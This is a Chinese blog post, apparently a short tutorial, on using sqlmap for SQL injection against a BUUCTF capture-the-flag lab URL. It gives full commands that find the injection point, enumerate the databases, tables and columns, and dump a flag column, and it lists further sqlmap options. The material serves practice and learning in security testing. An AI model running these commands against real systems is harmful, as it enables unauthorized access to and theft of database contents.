sqlmap的简单使用(sql注入)

1、判断是否存在注入点

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1

image-20210828220636098

2、查看所有数据库

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 --dbs

image-20210828220851848

3、查看数据中的列表

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 -D mysql -tables

image-20210828221030085

4、查看列表中的字段

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 -D note -T fl4g --columns

image-20210828221041910

5、查看字段的内容

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 -D note -T fl4g -C fllllag --dump

image-20210828221145496

6、然后还有一些其他的

-p 指定测试参数
-b 获取banner
--is-dba 是否为管理员权限
--current-user 查看当前数据库
--current-user 查看当前用户
--count 检索所有数据数量
--level 测试等级(1-5)默认为1
-v 显示详细信息
-D 指定数据库
-T 指定表
-C 指定列
(大写)

DBA:True表示是管理员权限

image-20210828221840024

用户

image-20210828221933347

当前数据库

image-20210828222007107

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值